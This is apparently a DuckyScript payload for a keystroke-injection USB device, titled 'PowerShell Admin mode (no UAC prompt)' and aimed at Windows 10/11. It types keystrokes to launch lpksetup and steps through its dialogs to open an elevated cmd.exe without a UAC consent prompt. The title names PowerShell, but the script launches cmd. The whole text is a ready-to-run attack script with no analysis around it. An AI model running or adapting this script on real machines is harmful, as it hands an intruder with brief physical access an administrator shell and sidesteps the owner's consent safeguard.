REM ########################################################################################
REM |                                                                                      |
REM |                 ███▄ ▄███▓ ██▓ ██▓ ██▀███   ▄▄▄      ▄▄▄       ██ ▄█▀                |
REM |                ▓██▒▀█▀ ██▒▓██▒▓██▒▓██ ▒ ██▒▒████▄   ▒████▄     ██▄█▒                 |
REM |                ▓██    ▓██░▒██▒▒██▒▓██ ░▄█ ▒▒██  ▀█▄ ▒██  ▀█▄  ▓███▄░                 |
REM |                ▒██    ▒██ ░██░░██░▒██▀▀█▄  ░██▄▄▄▄██░██▄▄▄▄██ ▓██ █▄                 |
REM |                ▒██▒   ░██▒░██░░██░░██▓ ▒██▒ ▓█   ▓██▒▓█   ▓██▒▒██▒ █▄                |
REM |                ░ ▒░   ░  ░░▓  ░▓  ░ ▒▓ ░▒▓░ ▒▒   ▓▒█░▒▒   ▓▒█░▒ ▒▒ ▓▒                |
REM |                ░  ░      ░ ▒ ░ ▒ ░  ░▒ ░ ▒░  ▒   ▒▒ ░ ▒   ▒▒ ░░ ░▒ ▒░                |
REM |                ░      ░    ▒ ░ ▒ ░  ░░   ░   ░   ▒    ░   ▒   ░ ░░ ░                 |
REM |                       ░    ░   ░     ░           ░  ░     ░  ░░  ░                   |
REM |                                                                                      |
REM | Title        : PowerShell Admin mode (no UAC prompt)                                 |
REM | Author       : Miiraak                                                               |
REM | Version      : v1.2                                                                  |
REM | Category     : Execute                                                               |
REM | Target       : Windows 10 / 11                                                       |
REM |                                                                                      |
REM ########################################################################################

REM Requirements:
REM     - Compte avec droit administrateur

REM Description:
REM     - Ouvre un cmd en administratateur

DEFAULT_DELAY 300
DELAY 1000
GUI r
STRING lpksetup
ENTER
ENTER
TAB
ENTER
ALT TAB
ALT TAB
UP
UP
MENU
UP
ENTER
TAB
REPEAT 4
RIGHT
REPEAT 4
TAB
REPEAT 2
ENTER
TAB
REPEAT 4
ENTER
STRING cmd.exe
ENTER
